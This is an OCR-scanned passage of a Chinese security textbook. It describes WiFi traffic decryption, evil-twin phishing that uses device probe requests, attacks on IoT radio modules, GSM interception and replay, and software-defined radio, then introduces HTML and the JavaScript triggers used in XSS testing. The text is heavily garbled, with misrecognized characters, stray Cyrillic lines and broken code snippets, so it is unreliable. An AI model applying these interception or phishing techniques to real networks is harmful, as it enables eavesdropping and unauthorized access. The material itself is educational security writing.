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同样 ， 这 个 方法 还 可 以 应 用 于 加 密 的 WiFi， 当 然 前 提 是 知道 密码 。 对 加 密 WiFi 通 信和 的 
数据 包 进 行 解 密 的 方法 也 很 简单 。 单 击 Decryption Keys 后 面 的 Edit 按 钮 ， 然 后 按照 第 一 层 
设置 界面 上 的 格式 要 求 添加 自己 所 需要 的 key， 即 可 将 加 密 的 WiFi 通 信 进 行 截取 ， 操 作 如 
图 5-14 所 示 。 
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图 5-14 Wireshark 添 加 目标 WiFi 密 钥 
这 种 被 动 监听 的 方案 在 做 了 ARP 隔 离 的 网 络 中 ， 或 者 在 想 彻底 隐蔽 上 自己 不 被 目标 的 网 
络 管理 员 发 现 的 情况 下 是 非常 有 效 的 攻击 方法 。 


544 已 保存 热点 钓鱼 


最 后 一 种 比较 常用 的 攻击 方式 就 是 利用 受害 者 设备 上 已 经 保存 的 热点 进行 钓鱼 攻击 。 
绝 大 多 数 WiFi 接 入 设备 都 会 日 动 连接 周边 的 能 搜索 到 的 且 名 称 已 保存 在 本 地 的 WiFi 网 络 。 
之 所 以 不 验证 热点 的 MAC 地 址 是 因为 很 多 时 候 企 业 组 网 都 会 用 大 量 同名 不 同 MAC 的 AP， 
而 终端 应 该 保证 在 这 些 AP 之 间 无 颖 切换。 但 是 这 里 就 给 了 攻击 者 可 乘 之 机 ， 即 建立 可 以 
和 目标 设备 保存 的 WiFi 同 名 的 热点 。 如 果 这 个 热点 没有 密码 ， 可 以 赁 此 轻松 对 目标 设备 
进行 中 间 人 攻击 ; 而 当 热 点 有 密码 的 时 候 ， 可 以 利用 这 个 钓鱼 热点 来 骗取 密码 (仍然 需 
要 破解 ) o 

这 种 方法 其 实 也 只 是 理论 可 行 ， 而 真正 使 其 工程 化 的 是 一 种 叫 Probe 的 机 制 。 由 于 隐 
藏 热点 的 存在 ， 同 时 为 了 提升 连接 效率 ， 许 多 移动 设备 会 主动 问 外 发 送 目 己 考虑 连接 的 热 
点 列表 ， 而 这 种 信息 在 airodump-ng 中 一 目 了 然 ， 如 图 5-15 所 示 。 

图 5-15 下 半 部 分 是 目前 网 卡 所 能 扫描 到 的 客户 端 列 表 ， 而 最 右边 一 栏 Probes 则 是 这 些 
客户 端 所 发 出 的 试探 信号 。 当 攻击 的 目标 机 发 出 了 Chinanet、CMCC 等 明显 没有 密码 的 热 
点 试探 信和 号， 或 者 知道 其 中 的 某 个 网 络 是 没有 密码 的 (例如 部 车 了 IMC Portal) 的 校园 内 
网 时 ， 就 可 以 轻易 开局 同名 热点 ， 然 后 对 大 量 客 户 端 进行 钓鱼 攻击 《客户 端 会 目 动 连 上 信 
号 最 强 的 同名 热点 ) 。 
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图 5-15 ”airodump-ng 对 Probe 的 显示 
由 于 许多 企业 都 采用 了 加 密 的 无 线 内 网 方案 ， 给 利用 无 线 网 进行 的 APT 造 成 了 障碍 ， 
此 时 如 果 能 利用 茶 一 台 会 发 送 Probe 的 客户 顺 ， 则 可 以 获取 到 密码 。 开 局 钓鱼 热点 之 后 ， 
анир бине ндыкнрүрин унй Ж, она ги один 4 


ЕД, та Е OA 界面 等 对 ВИД Ва. | 


5.5 ”杂项 


无 线 安 全 是 一 个 非常 复杂 的 领域 。 从 广义 上 讲 ， 无 线 安全 所 包含 的 远 远 不 止 WLAN 通 
信 ， 从 电报 安全 到 4G 网 络 与 卫星 通信 安全 ， 都 可 以 归 为 无 线 安 全 的 范畴， 本 节 将 讨论 无 
线 安 全 中 WiFi 以 外 的 部 分 。 

随 看 时 代 的 发 展 ， 生 活 中 大 量 的 有 线 通信 都 转变 为 了 无 线 通 信 。 我 们 关注 的 无 线 通信 
和 无 线 安全 也 不 能 仅仅 局 限于 WiFi， 还 有 大 量 的 领域 等 待人 们 去 探索 。 

现在 除了 WiFi 外 ， 无 线 通信 主要 还 有 蓝牙 、ZigBee、DVB-T、GSM 等 很 多 种 ， 这 些 
领域 多 多 少 少 都 会 有 一 些 安全 漏洞 。 举 个 简单 的 例子 ， 国 内 的 茶 些 基于 监 牙 4.0 协 议 的 手 
环 可 以 轻松 被 黑客 控制 。 它 们 普遍 存在 工厂 调试 接口 没有 封闭 或 者 加 密 ， 以 至 于 开发 者 可 
以 轻易 截取 并 解密 接口 ， 然 后 实现 对 手 环 控制 权 的 夺取 。 有 的 手 环 甚至 对 开源 方案 的 协议 
没有 做 任何 更 改 ， 攻 击 者 只 要 看 到 品牌 就 能 对 厦 文 档 直 接 进 入 工厂 模式 并 夺取 控制 权 。 夺 
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取 控 制 权 之 后 ， 攻 击 者 就 可 以 随意 更 改 屏 磊 内 容 ， 控 制 手 环 无 限 振动 ， 虽 然 这 并 不 能 造成 
太 大 损失 ,但 这 些 漏洞 看 实 令 人 担忧 。 

曾经 有 人 通过 使 用 一 个 四 轴 飞 行 右 夺取 为 一 个 四 轴 飞 行 占 的 控制 权 ， 这 就 属于 典型 
的 物 联网 透 传 的 漏洞 。 很 多 时 候 这 些 遥 控 设 备 使 用 的 并 非 是 生活 中 常见 的 通用 协议 ， 而 是 
使 用 了 低 成 本 的 nfr24101 等 蕊 片 进行 直接 通信 。 以 nrf24101p 为 例 ， 这 是 一 枚 非常 常见 的 无 
线 数 传 芯片 〈 可 以 简单 地 理解 为 不 使 用 蓝牙 /WiFi 的 无 线 串口 ) ， 它 本 身 支 持 AES 加 密 传 
输 ， 但 是 许多 开发 者 基于 性 能 考虑 或 者 干脆 就 是 因为 偷懒 而 没有 开局 这 个 功能 ， 以 至于 设 
备 和 设备 间 的 通信 可 以 轻易 被 监听 ， 甚 全 可 以 劫持 被 控 设 备 的 控制 权 。 

GSM 协 议 是 目前 世界 上 使 用 最 广 的 通信 协议 ， 但 是 它 本 身 也 有 许多 漏洞 。 这 个 协议 
可 以 说 是 很 不 安全 的 ， 它 的 很 多 漏洞 很 早 就 已 经 被 发 现 ， 但 至 今 也 没有 得 到 妥善 修复 。 有 
些 运 营 商 假设 GSM 网 络 根 本 就 没有 做 传输 加 密 处 理 ， 以 至 于 不 利用 漏洞 就 可 以 轻易 监听 
在 空中 明文 传输 的 短信 等 内 容 。 而 3G 和 4G 网 络 一 直 被 认为 是 安全 的 通信 方式 ， 可 是 前 段 
时 间 3G 网 络 也 被 攻破 了 ， 攻 击 者 也 许 是 出 于 维护 公共 网 络 安全 的 目的 并 没有 公开 攻击 方 
式 与 所 利用 的 漏洞 。4G 可 以 说 是 目前 唯一 认为 比较 安全 的 移动 通信 ，4G 网 络 中 的 应 用 层 
不 加 密 协 议 通 信 ， 被 认为 是 不 可 以 被 除 用 户 和 目 己 和 运营 商 外 第 三 方 监 听 的 。 

有 些 设备 例如 大 多 数 对 讲 机 天 生 就 不 具备 加 密 特 性 ， 它 的 所 有 通信 都 可 以 被 轻易 监 
听 ， 监 听 者 甚 全 只 需要 将 对 讲 机 调 全 同一 频段 就 能 实现 监听 。 谈 到 对 讲 就 不 得 不 说 一 个 在 
国际 安全 界 已 经 引起 注意 的 严重 问题 ， 那 就 是 机 场 塔台 与 飞机 之 间 的 通信 。 使 用 特殊 的 设 
в (其实 很 常见) 和 专门 的 软件 可 以 轻易 监听 机 场 塔台 和 飞机 之 间 的 对 讲 等 通信 ， 此 时 如 
果 发 出 干扰 信号 去 引 寻 飞机 飞 辐 错 误 的 方向 ， 很 可 能 会 引起 非常 严重 的 事故 ， 这 可 以 说 是 
一 个 真正 威胁 到 普通 民众 生命 安全 的 无 线 安全 漏洞 。 

另 一 个 长 期 受 关 注 的 主题 是 &FID 与 NFC 的 安全 。 简 单 地 说 ， 这 就 是 近 距 离 非 接触 式 
通信 的 安全 。 从 严格 意义 上 来 讲 ， 这 是 和 之 前 讲 的 无 线 安全 不 相关 的 内 容 。NFC 安 全 是 研 
究 对 各 种 加 密 或 是 不 加 密 的 卡片 进行 破解 、 复 制 、 修 改 信息 等 内 容 。NFC 在 当今 社会 大 量 
用 于 身份 验证 和 文 付 ，NFC 的 漏洞 可 以 使 攻击 者 对 物理 空间 进行 未 授权 访问 ， 或 者 去 商店 
“ 偷 ” 抹 从 小 饼干 。 


551 物 联 网 透 传 


随 独 互联 网 技术 、 无 线 通信 技术 以 及 艇 入 式 行业 的 鞍 勃 发 展 ， 智 能 家 居 渐 渐进 入 了 人 
们 的 视野 ， 各 种 智能 插座 、 家 庭 控制 中 心 在 一 次 次 的 众 筹 中 诞生 ， 但 这 些 已 经 渐渐 掌控 了 
家 庭 中 各 种 物品 控制 权 的 设备 真 的 安全 吗 ? 

先 来 谈 谈 各 种 射频 模块 。 射 频 模块 通常 被 称 为 REF 模块， 不 同 的 射频 模块 工作 在 不 同 
的 频段 。 通 常 射频 模块 使 用 目 己 的 私有 协议 ， 实 现 的 功能 可 以 简单 地 理解 为 无 线 串 口 。 但 
是 在 不 使 用 应 用 层 或 者 协议 层 的 加 密 时 ， 这 些 模块 之 间 的 通信 往往 是 不 加 密 的 ， 只 需要 有 
相同 〈 或 者 文 持 相同 协议 的 ) 模块 即 可 轻易 监听 所 有 通信 和 内容。 

以 APC220 模 块 为 例 ， 这 是 一 个 常见 的 工作 在 433MHz 频 段 的 射频 数字 信号 传输 模块 。 
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它 可 以 模拟 为 一 个 串口 设备 与 主 控 芯片 连接 ， 同 时 发 送 所 有 从 主 控 串口 上 接收 到 的 信息 ， 
并 且 将 自己 以 无 线 信 和 号 形式 接收 到 的 信息 使 用 串口 发 送 给 主 控 必 片 ， 实 现 多 设备 之 间 的 无 
线 数 传 。 

APC220 是 一 个 非常 优秀 的 模块 ， 功 耗 较 低 而 信号 较 强 。 两 块 APC220 可 以 间隔 几 白 米 
或 者 隔 着 好 几 堵 承重 墙 依 然 维持 稳定 的 通信 。 这 个 模块 在 通信 能 力 方 面 可 以 被 视 为 极其 优 
秀 的 ， 但 是 模块 之 间 的 通信 并 没有 被 加 密 ， 使 用 第 三 个 APC220 可 以 轻易 监听 男 外 两 个 模 
块 之 间 的 通信 。 

当 这 样 的 无 线 数 传 模块 被 应 用 到 智能 家 居中 时 就 会 产生 很 多 问题 。 例 如 现在 比较 流行 
的 智能 家 居 通 种 会 包含 射频 控制 车 库 门 开关 的 功能 ， 此 时 的 通信 内容 各 是 每 次 指令 都 一 模 
一 样 〈 非 常常 见 的 情况 ) ， 那 么 攻击 者 可 以 轻易 截取 空中 传输 的 控制 信 令 ， 从 而 进行 重 放 
攻击 ， 打 开车 库 门 ， 轻 松 对 民宅 进行 未 授权 访问 。 

假设 男 外 一 种 更 加 安全 的 情况 ， 如 果 控 制 中 心 和 车 库 门 之 间 使 用 加 密 通 信 ， 并 在 通信 
内 容 中 包含 时 间 稚 ， 那 么 这 样 的 通信 就 会 变 得 非常 难以 破解 ， 也 不 可 能 被 重 放 ， 从 而 实现 
了 对 家 性 安全 的 展 好 保护 。 

这 里 主要 是 提醒 各 位 谈 者 有 天智 能 家 居 和 智能 硬件 的 问题 ， 现 在 智能 家 居 和 智能 人 硬件 
还 属于 新 兴 行 业 ， 很 多 产品 都 处 于 不 成 熟 阶 段 ， 也 许 它 们 的 功能 很 令 人 满意 ， 但 是 它们 的 
安全 性 在 攻击 者 和 面前 却 可 能 不 堪 一 击 。 

很 多 随身 设备 也 一 样 是 不 安全 的 ， 典 型 的 是 智能 手 环 。 国 内 曾经 有 开发 者 发 现 了 茶 闭 
源 手 环 的 无 限 振 动 漏 洞 。 当 然 这 样 的 漏洞 危害 不 大 ， 而 不 会 有 什么 实际 的 危害 性 。 但 是 这 
只 是 很 普通 的 运动 记录 设备 ， 一 旦 使 用 者 佩戴 的 是 具有 人 危险 性 的 设备 ， 例 如 市 有 电击 叫 醒 
功能 的 手表 或 者 心脏 起 捕 髓 ， 这 样 的 设备 如 果 有 安全 漏洞 ， 并 且 遭 过 攻击 ， 就 可 能 对 生命 
安全 造成 严重 威胁 。 


5.5.2 移动 通信 


移动 通信 是 我 们 在 日 常生 活 中 几乎 离 不 开 的 东西 ， 从 最 早 的 寻呼机 、 大 哥 大 ， 到 现在 
文 持 LIE、WiMAX 等 4G 协 议 的 终端 设备 ， 都 在 使 用 移动 通信 。1G 网 络 早已 彻底 退役 ，1G 
网 络 被 广泛 应 用 的 那个 时 代笔 者 还 没 出 生 。2G 网 络 则 在 当今 世界 还 有 极其 广泛 的 应 用 。 
2G 网 络 可 以 分 为 FDMA〔 频 分 多 址 ， 不 同 设备 /传输 方 回 工作 在 不 同 小 频段 ， 国 内 GSM 网 
络 采 用 此 方式 ) ; ТОМА 〈 时 分 多 址 ， 将 时 间 分 为 多 个 帧 ， 设 备 在 基站 分 配 的 允许 的 时 
段 / 帧 进行 数据 发 送 或 接收 ) ; СОМА (和 码 分 多 址 ， 没 有 物理 频段 区 分 ， 只 有 逻辑 频道 ， 
基站 和 终端 使 用 信号 中 的 代码 区 分 信号 发 送 者 与 接收 方 ) 。CDMA 是 较为 安全 的 网 络 ， 而 
另外 两 种 则 漏洞 百出 。 虽 然 大 多 数 漏洞 都 已 被 封 堵 ， 但 是 仍旧 有 许多 运营 商 在 使 用 存在 漏 
洞 的 设备 ， 有 些 运营 商 甚 至 干脆 没有 对 自己 拥有 的 GSM 蜂 窜 网 络 通信 做 加 密 处 理 。 攻 击 
者 可 以 轻易 地 使 用 非常 便宜 的 设备 实现 对 短信 的 监 昕 。 如 果 攻 击 者 奶 踪 了 GSM 通 信 的 跳 
频 ， 甚 至 可 以 实时 监听 通话 。 

国外 有 一 个 在 安全 界 很 出 名 的 项 目 叫 Osmocom， 这 个 项 目 主 要 针对 GSM 做 渗透 测 
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试 。 项 目 组 开源 了 一 套 对 GSM 网 络 做 特殊 应 用 的 套件 ， 也 放出 了 一 套 能 自动 收集 当地 
GSM 网 络 安全 性 信息 的 虚拟 机 镜像 。 比 较 典 型 的 可 以 用 于 监听 的 设备 是 摩托 罗拉 的 C118/ 
C123 手 机 ， 只 要 使 用 标准 的 3.5mm 首 频 接口 串口 线 加 上 一 个 3.5mm 转 2.5mm 的 音频 转 接 
头 ， 以 及 一 个 USB 转 TTL 串 口 的 模块 ， 就 可 以 将 C118 使 用 串口 连接 到 计算 机 ， 从 而 使 用 
Osmocom 的 工具 进行 渗透 测试 。 

使 用 原版 的 C118 只 能 监听 附近 基站 指定 信道 的 GSM 通 信 ， 但 是 如 果 对 C118 中 的 某 几 
个 滤波 器 以 及 其 他 元 件 使 用 特定 的 元 件 百 换 ， 就 可 以 发 送信 号 ， 干扰 正常 的 GSM 通 信 。 
鉴于 搭建 伪 基 站 是 违法 行为 ， 本 书 中 不 对 具体 的 方法 做 解析 。 

当 你 的 GSM 手 机 受到 伪 基 站 攻击 时 会 出 现 短暂 的 信号 丢失 ， 然 后 立刻 变 得 比 之 前 正 
常 通信 的 状态 强 ， 攻 击 停止 时 也 会 出 现 短暂 的 信号 丢失 ， 之 后 信号 比 被 攻击 时 弱 。 伪 基站 
可 以 伪装 成 任何 号 码 向 你 的 手机 发 送 短信 甚至 拨打 电话 。 例 如 伪 基 站 伪装 成 银行 官方 号 码 
向 你 的 手机 发 送 诈骗 短信 ，“ 注 意 发 件 人 号 码 ” 的 技巧 将 不 再 管用 ， 你 可 能 会 轻信 短信 中 
所 陈述 的 内 容 。 

最 近 的 消息 是 3G 网 络 〈 特 指 WCDMA/ 联 通 系 ， 可 能 包括 TD/ 移 动 系 ， 不 包括 电信 /高 
通 系 的 CDMA2000) 也 可 以 被 监听 短信 ， 这 导致 我 们 对 于 移动 通信 的 可 信 度 产生 了 新 的 怀 
疑 。 也 许 在 移动 通信 中 只 有 网 络 通信 才 是 真正 安全 的 。 

对 移动 通信 感 兴趣 的 读者 可 以 研究 一 下 一 个 名 为 “OpenBTS” 的 开源 基站 程序 ， 这 个 
程序 基于 GnuRadio 运 行 ， 算 是 软件 无 线 电 的 一 种 功能 、 实 例 。 OpenBTS 文 持 常 规 频 分 多 
址 的 GSM 网 络 以 及 UMTS 制式 的 3G 通 信 。 


5.5.3 软件 无 线 电 


软件 无 线 电 是 在 当前 的 无 线 电 领 域 非常 有 用 的 设备 ， 或 者 说 是 方法 。 灿 文 名 为 SDR 
(Software Defined Radio) ， 即 软件 定义 无 线 电 。 这 个 概念 理解 起 来 非常 简单 ， 通 和 典型 
的 无 线 电 设备 ， 例 如 手机 中 的 基带 芯片 、nrfS$1822 低 功 耗 赣 牙 心 片 等 都 属于 对 无 线 通 信 协 
议 的 硬件 (固件 ) 实现 。 但 是 无 线 通信 本 身 无 非 是 在 空中 传播 的 信号 ， 所 以 软件 实现 无 线 
电 协 议 在 理论 上 是 完全 可 行 的 。Gnu Radio 是 一 套用 于 软件 无 线 电 的 工具 ， 根 据 官 网 的 说 
明 ， 就 连声 卡 都 能 用 于 软件 无 线 电 。 

现在 成 本 比较 低 的 SDR 实 现 是 用 Realtek 公 司 生 产 的 电视 棒 做 接收 器 ， 俗 称 RTL-SDR。 
一 根 Realtek 的 电视 棒 ， 通 常 仅 需 50 多 元 即 可 买 到 ， 即 便 是 被 专门 修改 过 周边 电路 以 进行 
低频 接收 的 设备 ， 也 仅仅 只 需 200 多 元 ， 最 高 能 监听 1.7GHz 的 信号 。 专 业 些 的 设备 会 比较 
贵 ， 例 如 HackRF 这 一 款 SDR 设 备 ， 价 格 将 近 2000 元 ， 但 是 可 以 收发 的 范围 也 能 达到 可 怕 
的 6GHz。 

此 处 有 一 点 非常 重要 ， 必 须 在 此 说 明 : 在 进行 不 明确 免费 民用 频段 的 SDR 研 究 时 一 定 
要 保持 彻底 沉默 地 被 动 监 听 ， 不 要 试图 主动 发 送 任何 信号 。 国 家 在 无 线 电 方面 有 很 严格 
的 管理 机 制 ， 只 人 允许 特定 的 人 《设备 ) 在 特定 的 频段 发 送 特定 范围 内 的 信号 ， 在 进行 需 
要 发 信 的 SDR 研 究 前 依照 规定 应 取得 业余 无 线 电 操 作证 书 。 平 时 我 们 使 用 的 WiFi 工 作 在 
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2.4GHz， 这 是 国家 开放 使 用 的 频段 ， 但 是 有 一 定 的 功率 限制 一 一 你 不 能 架设 一 个 功率 巨大 
的 WiFi 热 点 向 整个 县 或 是 区 域 广播 信息 。S$GHz 的 WiFi 现 在 也 是 一 个 趋势 ，802.11AC 标 准 
就 是 为 SGHz 设 定 的 。 但 是 很 多 国家 $GHz 频 段 中 的 部 分 小 频段 是 不 允许 使 用 的 ， 因 为 这 些 
频段 很 可 能 是 军用 或 者 因 其 他 原因 管制 的 。 一 些 比较 优秀 的 路 由 器 中 都 会 要 求 你 为 SG 频 
段 设 置 国家 ， 以 便 路 由 器 知道 它 所 在 的 位 置 允 许 使 用 的 频段 。 

无 线 电 通 信 有 非常 复杂 的 知识 理论 ， 篇 幅 所 限 ， 无 法 太 过 深入 。 这 里 仅 介 绍 一 些 无 线 
通信 和 领域 的 常识 ， 希 望 读者 能 对 无 线 通信 有 一 些 基 本 理解 。 

读者 也 许 思考 过 一 个 问题 ， 为 什么 U 盘 必须 插 在 计算 机 上 ? 既然 无 线 信号 能 够 传输 数 
据 ， 那 么 是 不 是 U 盘 只 要 供 上 电 ， 不 揪 在 计算 机 上 也 能 用 ? 生活 常识 告诉 我 们 ， 显 然 是 不 
能 用 。 但 是 为 什么 呢 ? 空间 中 的 信和 号 传输 是 不 稳定 的 ， 日 常生 活 中 常见 的 信号 源 都 是 低频 
信号 源 ， 所 传递 的 信息 也 是 低频 率 的 信息 。 比 如 声波 就 是 一 种 典型 的 低频 信号 。 麦 克 风 的 
原理 揭示 了 声波 可 以 直接 转换 成 同 频 的 电信 号 ， 但 是 这 样 的 电信 号 如 果 直 接 发 送 ， 由 于 频 
率 较 低 ， 即 使 经 过 功率 放大 也 非常 容易 受到 干扰 ， 几 乎 无 法 无 线 传输 。 这 时 调制 解 调 技术 
就 被 引入 到 了 无 线 传输 中 。 人 们 日 常 接触 到 的 信号 源 首先 被 数字 化 ， 全 部 转换 为 二 进 制 内 
容 ， 然 后 使 用 高 频 的 电磁 波 发 送 〈 称 为 载波 ) ， 使 得 信号 在 传输 过 程 中 所 受 的 干扰 减 小 。 
当 接 收 端 接收 到 信号 时 ， 首 先进 行 滤波 ， 滤 除 不 在 载波 频段 上 的 信号 ， 然 后 对 载波 进行 解 
调 ， 恢 复 其 中 的 数字 信息 。 这 个 过 程 其 实 包含 了 一 次 信息 丢失 ， 输 入 的 信号 例如 声音 本 质 
上 是 模拟 信号 ， 但 是 经 过 这 个 系统 的 传输 ， 转 换 成 了 数字 信和 号， 再 精细 的 数字 信号 也 会 
在 数 模 转换 的 过 程 中 导致 信息 的 丢失 。 将 这 个 原理 应 用 到 我 们 日 常 的 WiFi 通 信 中 ， 就 可 
以 把 计算 机 发 送 数 据 (精确 到 bit)〉 的 速率 理解 为 信号 本 身 的 频率 ， 而 WiFi 信 号 的 频率 为 
2.4GHz， 远 远 高 于 计算 机 发 送 的 数据 频率 。 这 也 说 明了 为 什么 SG 网 络 比 2.4G 网 络 在 理论 
上 快 许多 的 原因 ， 除 了 干扰 源 更 少 以 外 ， 同 样 重要 的 原因 是 5G 频 率 的 信号 作为 载波 能 承 
载 更 高 频率 的 原始 信号 。 
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力 可 以 说 是 极其 强大 的 。 在 这 个 万 物 趋 癌 互 联 的 世界 ， 了 解 一 些 无 线 安 全 知识 ， 做 到 心中 
有 数 ， 是 非常 重要 的 。 
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БА Web 2.0 的 高 速 发 展 ， 众 多 前 端 语言 也 越 来 越 多 地 出 现在 人 们 视野 中 。 短 短 几 年 
间 ，HIML5、XHTML、XML、yJavaScript 被 大 量 使 用 ， 为 用 户 提 供 更 好 的 Surfing 体 验 ， 
对 图 片 、 音 频 、 视 频 的 处 理 更 是 花样 百出 。 然 而 短 短 的 几 年 时 间 是 远 远 不 够 让 一 个 新 生 事 
物 发 展 成 熟 的 ， 而 不 成 熟 的 新 技术 中 存在 的 问题 反而 为 黑客 提供 了 契机 。 本 章 讲 解 Web 前 
端 中 的 安全 问题 。 
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下 面 介 绍 一 些 前 端 开 发 领域 中 的 常识 ， 通 过 介绍 一 些 非常 重要 的 “点 ”， 让 读者 迅速 
抓 住 学 习 重 点 。 此 外 还 需 读 者 自行 汲取 更 多 知识 ， 将 这 些 “ 点 ” 连 成 “ 线 ”， 最 终 熟 练 运 
用 ， 形 成 一 个 知识 “ 面 ”。 


6.1.1 HTML 基础 


HIML 即 超 文本 标记 语言 ， 是 构成 网 页 的 重要 框架 。 当 浏览 一 个 页 面 时 ， 浏 览 器 会 
和 目 动 解析 对 应 的 HIML 语 铝 ， 将 其 转化 为 页 面 呈现 出 来 ， 对 于 浏览 器 来 说 ， 这 个 过 程 称 为 
“解释 ”， 如 果 想 要 查看 这 些 页 面 的 HTML 代 码 ， 除 了 使 用 一 些 插件 外 ， 最 简单 的 方式 是 
直接 在 页 和 面 上 右键 选择 查看 源码 。 下 面 以 百度 前 页 为 例 ， 其 页 和 面 对 应 的 HTML 代 码 如 图 
6-1 所 示 。 
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图 6-1 百度 网 页 及 源码 
一 个 漂亮 的 网 页 ， 除 了 需要 有 HIML 以 外 ， 还 需要 有 层 登 样式 表 CSS 对 其 进行 修饰 。 有 趣 
的 是 ， 正 是 因为 CSS， 才 导致 XSS 〈 跨 站 脚本 攻击 ) 被 迫 改 名 换 姓 ， 后 面 会 详细 介绍 XSS。 
从 黑客 以 及 安全 开发 者 的 角度 来 看 ， 除 了 要 遵守 成 型 的 开发 标准 ， 还 需要 同时 学 习 
安全 开发 ， 并 从 黑客 的 角度 思考 问题 ， 培 养 安 全 意识 。 下 面 让 我 们 来 简明 扼要 地 介绍 一 下 
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HTML 和 CSS 的 基本 写法 。 
首先 ， 打 开 一 个 文本 编辑 器 〈 记 事 本 即 可 ) ， 在 其 中 输入 如 图 6-2 所 示 的 文本 ， 并 另 
存 为 一 个 .html 后 级 的 文件 ， 双 击 这 个 文件 ， 浏 览 器 会 负责 打开 它 ， 如 图 6-2 所 示 。 
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图 6-2 ”演示 HTML 页 面 ( 1 ) 

这 时 浏览 器 所 显示 的 还 是 一 个 空白 页 面 ， 这 是 因为 我 们 只 搭建 了 HTMIL 的 基本 框架 ， 
还 尚未 填充 内 容 。 来 看 一 下 已 经 写 入 的 内 容 ，<html></html> 标 签 内 是 页 面 的 主体 ， 注 意 
标签 要 成 对 出 现 。 其 中 包含 了 男 外 两 个 双 标 签 <head> 和 <body>， 从 字面 意义 就 很 容易 理 
解 ， 它 们 就 是 页 面 的 头 和 主体 ， 在 <head> 标 签 内 我 们 可 以 再 用 <title></title> 标 签 插 入 页 
面 标题 ， 也 可 以 用 <style></style> 标 签 修 饰 当前 页 面 的 样式 ， 而 <body> 标 签 内 部 可 以 插 
入 我 们 正文 的 主体 ， 例 如 标示 段落 的 <p></p> 标 签 、 区 隔 标记 <div></div> 等 。 另 外 还 有 
很 多 更 为 有 趣 的 标签 ， 正 是 这 些 标签 构成 了 精彩 的 Web 页 面 。 具 有 更 多 功能 的 标签 例如 
<h[1~6]></h[1~~6]> 可 以 标示 字体 的 大 小 ，hl 最 大 ，h6 最 小 。 下 面 我 们 简单 演示 一 下 页 面 
效果 ， 如 图 6-3 所 示 。 
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6-3 演示 HTML 页面 ( 2 ) 
从 图 6-3 可 以 看 出 ， 页 面 标题 为 “这 里 是 标题 ”， 而 页 面 也 有 了 段落 内 文本 和 字体 
为 hl 的 文本 。 除 了 双 标 签 以 外 ，HTML 还 有 一 些 所 谓 的 单 标签 也 很 常用 ， 例 如 换行 标记 
<br>、 分 割 线 <hr> 等 。 
НТМІ 内 属性 的 使 用 也 十 分 重要 ， 使 用 格式 : 
< 标签 属性 =" 属 性 "> 
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例如 : <р style="colorred">， 效 果 如 图 6-4 所 示 。 
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图 6-4 ”演示 HTML 页面 ( 3 ) 
从 图 6-4 可 以 看 出 ，style 属 性 内 定义 的 颜色 为 红色 在 页 面 中 生效 了 。 


6.1.2 使 用 JavaScript 


前 面 介绍 了 HTML， 读 者 还 需要 再 了 解 一 下 JavaScript。 在 讲解 JavaScript 之 前 ， 先 介 
绍 一 下 同 源 全 上 略 。 

同 源 策略 是 浏览 器 的 核心 策略 之 一 ， 例 如 目 行 查找 时 也 许 会 看 到 这 样 一 句 话 : 

“所 谓 同 源 是 指 域名 、 协 议 、 端 口 相同 。” 下 面 是 几 个 与 http:/www.mapers.net 是 否 同 源 

的 例子 。 

> http://mapers.net: 不 同 域 ， 域 名 不 同 ， 这 里 是 顶级 域名 。 

> https://www.mapers.net: 不 同 域 ， 协 议 不 同 ， 这 里 是 https 协 议 。 

> http://test.mapers.net: 不 同 域 ， 域 名 不 同 ，test 是 另 一 个 子 域 。 

> http://wwwmapers.net:123: 不 同 域 ， 端 口 不 同 ，123 端 口 与 80 端 口 〈 默 认 端 口 ) ЖЕ. 

> http://www.mapers.net/a/: 同 域 ， 满 足 域名 、 协 议 、 端 口 相同 。 

通俗 地 讲 ， 如 果 你 试图 通过 JavaScript 脚 本 获取 当前 页 面 的 信息 或 者 让 它 进行 你 所 期 
望 的 操作 ， 那 么 就 需要 让 脚本 在 这 个 页 面 触 发 。 

详细 介绍 JavaScript 的 编程 语法 会 占用 大 量 篇 幅 ， 这 里 只 简明 扼要 地 提出 一 些 用 于 测 
试 的 语句 和 触发 方法 。 事 实 上 在 很 多 时 候 ， 用 于 达到 目的 的 JavaScript 脚 本 在 网 上 能 大 量 
搜集 到 ， 可 以 作为 参考 。 

下 面 是 使 用 JavaScript 的 几 种 具体 方式 。 


1. 使 用 JavaScript 伪 协议 在 浏览 器 的 URL 栏 直接 触发 


在 浏览 器 URL 栏 输入 的 代码 如 图 6-5 所 示 。 

URL 栏 中 的 JavaScript 便 是 这 种 方式 的 脚本 触发 环境 ， 而 后 面 紧 跟 的 alert() 函 数 也 就 是 
弹出 人 警告 框 ， 有 些 跨 站 师 提 倡 在 测试 中 尽量 使 用 prompt()， 笔 者 也 经 历 过 针对 alert(0) 函 数 的 
过 滤 ， 却 还 是 喜欢 用 alert(0) 来 测试 。 
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cript:alert(1) 


А А 


图 6-5 ”在 URL 栏 执行 JavaScript 
2. 写 入 页 面 中 的 脚本 


依然 以 刚才 学 习 HTML 时 所 用 的 网 页 为 例 ， 在 代码 中 新 写 入 一 句 <body onload="alert 
(' 这 是 一 个 Onload 事 件 ') ">， 效 果 如 图 6-6 所 示 。 
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6-6 опоаа Ей Ж.ауаЗспр! 
onload 事 件 在 HIML 内 使 用 将 会 触发 其 中 的 JavaScript 函 数 执行 对 应 的 语句 。 
当然 ， 还 可 以 用 <scrip 人 标签 引入 JavaScript， 后 文 将 有 实例 说 明 。 


3. 加 载 外 部 脚本 


在 编写 网 页 的 时 候 ， 时 第 需要 插入 脚本 ， 对 于 短 的 脚本 用 前 两 种 方式 就 足够 应 付 了 ， 
如 果 脚 本 的 内 容 太 长 ， 就 不 得 不 使 用 加 载 外 部 脚本 的 方法 来 执行 ， 只 要 使 用 <scrip 全 标签 
的 src 属 性 即 可 ， 如 下 例 。 

<script src="http://www. хххх.сош/ххх"></5сирЕ> 

http://www. Xxxx.com/Xxx 指 问 一 个 JavaScript 地 址 ， 而 这 里 所 需要 做 的 只 是 指向 它 ， 
这 样 当 前 页 面 就 会 执行 这 个 JavaScript 脚 本 了 ， 关 于 这 种 用 法 后 面 还 会 用 到 。 


6.1.3 URL 地 址 的 构成 


URL 其 实 就 是 平时 大 家 所 说 的 网 址 ， 只 是 比 通常 人 们 想象 中 要 稍微 复杂 一 些 ， 一 个 标 
准 的 URL 地 址 结构 如 下 。 
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协议 名 :// 主机 地 址 [ :端口 ] / ВЕ / І; 280 [? 查 询 ]# 信 息 片 段 


平时 我 们 所 访问 的 网 址 其 实 是 有 所 省 略 的 ， 例 如 www.baidu.com， 如 果 将 它 完 整地 写 
出 来 ， 应 该 是 http://www.baidu.com: 80/。 

